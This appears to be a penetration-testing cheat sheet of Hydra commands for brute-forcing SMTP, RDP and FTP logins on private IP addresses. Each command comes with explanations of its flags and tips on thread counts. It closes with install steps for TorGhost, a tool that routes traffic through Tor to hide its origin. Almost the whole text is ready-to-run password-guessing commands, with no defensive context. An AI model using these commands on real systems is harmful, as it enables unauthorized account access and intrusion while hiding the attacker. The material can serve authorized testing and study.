SMTP Brute Force
hydra -s 25 -v -V -l [email protected] -P wordlist.txt -t 1 -w 20 -f 192.168.10.5 smtp
-l LOGIN name
-P load several passwords from FILE
-s port
-v verbose mode
-V show login+pass combination for each attempt
-t run TASKS number of connects in parallel
-w wait time for responses (32s) / between connects per thread
-f exit after the first found login/password pair
RDP Brute Force
hydra -t 1 -V -f -l administrator -P wordlist.txt rdp://192.168.0.100
-t 1 Tasks set to 1, good enough for a VM but you can up it if you have a physical pc dedicated to this, too many threads will yield false results. Play with it.
-V verbose, give me all output while you work
-f quit once you found a positive user:pass match
-l use the username admin to attempt to login
-P This is the word list that we will be pulling passwords from.
rdp://192.168.0.100 – This is the target IP
FTP Brute Force
hydra -V -l administrator -P password.lst ftp://192.168.56.101
-V This will show you all the username and password combination hydra is using to attack on server.
-l this is the username you want to use for attack.
-L list of users.txt
-P Provide list of password to attack.
ftp://IP Provide the victim IP and service. Once you provided the service FTP it will start attack on port 21.
-s if you want to use custom port, like for ssh some of the system administrator change custom port you can use -s to mention that
Install TorGhost
git clone https://github.com/SusmithKrishnan/torghost.git
cd torghost
chmod +x build.sh
./build.sh
